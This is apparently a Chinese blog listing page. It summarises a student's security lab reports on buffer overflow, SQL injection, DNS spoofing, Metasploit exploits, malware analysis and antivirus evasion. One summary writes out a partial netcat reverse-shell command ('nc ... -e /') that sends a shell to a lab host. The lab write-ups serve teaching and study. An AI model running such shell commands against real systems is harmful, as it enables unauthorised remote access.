摘要:一、实践目标 1.本次实践的对象是一个名为20154310(原为pwn1)的linux可执行文件。 2.该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 3.该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运 阅读全文
posted @ 2018-06-04 23:20 林启亮 阅读(137) 评论(0) 推荐(0) 编辑
摘要:一、基础问题回答 SQL注入原理:就是通过把SQL命令插入到“Web表单递交”或“输入域名”或“页面请求”的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。设计程序中忽略对可能构成攻击的特殊字符串的检查。后台数据库将其认作正常SQL指令后正常执行,可能实现对后台数据库进行各种操作,甚至造成破坏后 阅读全文
posted @ 2018-06-04 23:18 林启亮 阅读(105) 评论(0) 推荐(0) 编辑
摘要:一、实验过程 1.输入sudo vi/etc/apache2/ports.conf查看apache端口情况,更改端口号。 因为未知原因无法更改,因而跳过这个步骤,沿用原来的端口号4316. 2.通过service apache2 start开启Apache,使用netstat -aptn查看确认端口 阅读全文
posted @ 2018-05-25 11:02 林启亮 阅读(127) 评论(0) 推荐(0) 编辑
摘要:1. 实验内容 本次实践目标是掌握信息搜集的最基础技能与常用工具的使用方法。 (1)各种搜索技巧的应用 (2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点 (4)漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞 2.实验步骤 1、 信息搜 阅读全文
posted @ 2018-05-10 22:15 林启亮 阅读(427) 评论(0) 推荐(0) 编辑
摘要:一、基础问题回答 (1)通常在什么场景下容易受到DNS spoof攻击 在同一个局域网下,攻击者用冒名服务器攻击。类似于公共场合的免费WiFi,最容易被攻击。 (2)在日常生活工作中如何防范以上两攻击方法 不要随便点陌生人发来的网站链接,提高自身防范意识。 在公共场合最好不要连接免费的WiFi 二、 阅读全文
posted @ 2018-05-10 20:45 林启亮 阅读(153) 评论(0) 推荐(0) 编辑
摘要:一、实验内容 (1)一个主动攻击,如ms08_067; (2) 一个针对浏览器的攻击,如ms11_050; (3)一个针对客户端的攻击,如Adobe; (4)成功应用任何一个辅助模块。 二、实验步骤 (一)windows服务渗透攻击(MS08-067漏洞攻击) 1.使攻击机与靶机相互ping通 2. 阅读全文
posted @ 2018-04-27 10:22 林启亮 阅读(205) 评论(0) 推荐(0) 编辑
摘要:一、实践目标 1.监控自己系统的运行状态,看有没有可疑的程序在运行。 2.分析一个恶意软件,分析Exp2或Exp3中生成后门软件。 二、实践步骤 1.系统运行监控 使用 netstat 定时监控 首先创建一个txt文件,用来将记录的联网结果按格式输出到netstatlog.txt文件中,内容为: d 阅读全文
posted @ 2018-04-21 20:36 林启亮 阅读(89) 评论(0) 推荐(0) 编辑
摘要:一、基础问题回答 (1)杀软是如何检测出恶意代码的? ①基于特征码的检测:AV软件厂商通过检测一个可执行文件是否包含一段与特征码库中相匹配的特征码从而判断是否为恶意软件。 ②启发式恶意软件检测:就是根据一个程序的特征和行为如果与恶意软件相似,就判定为恶意软件。 ③基于行为的恶意软件检测:同启发式,启 阅读全文
posted @ 2018-04-09 12:51 林启亮 阅读(100) 评论(0) 推荐(0) 编辑
摘要:一、实验操作步骤 1.Windows获得Linux Shell ipconfig查询Windows主机IP地址 在Windows中输入win+r→cmd→cd→ncat目录文件→ncat.exe -l -p 4310(监听端口) 在Linux输入 nc 192.168.1.185 4311 -e / 阅读全文
posted @ 2018-04-03 20:56 林启亮 阅读(199) 评论(0) 推荐(0) 编辑